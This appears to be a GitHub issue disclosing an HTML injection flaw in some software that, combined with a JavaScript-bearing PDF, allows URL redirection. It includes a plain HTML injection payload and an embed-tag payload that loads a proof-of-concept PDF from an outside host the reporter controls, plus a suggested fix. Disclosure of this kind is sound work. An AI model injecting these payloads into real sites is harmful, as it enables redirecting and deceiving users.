In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable
Passer6y opened this issue · comments
In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable.
- HTML injection
[HTML injection] (https://i.loli.net/2018/11/15/5bec54988cbe0.png)
payload :
<h1 style="color=red">xxx</h1>
Fix the vulnerability: please use html entity encode
- PDF- Javascript- excute combined with html injection
poc:https://www.0u0.ooo/output.pdf
because of embed tags are not restricted by the same-origin policy, so we could upload my poc pdf file to our vps, and inject following code:
payload:<embed width="100%" height="100%" name="plugin" id="plugin">
src="https://www.0u0.ooo/output.pdf" type="application/pdf" internalinstanceid="5">
result:
1 img
2 img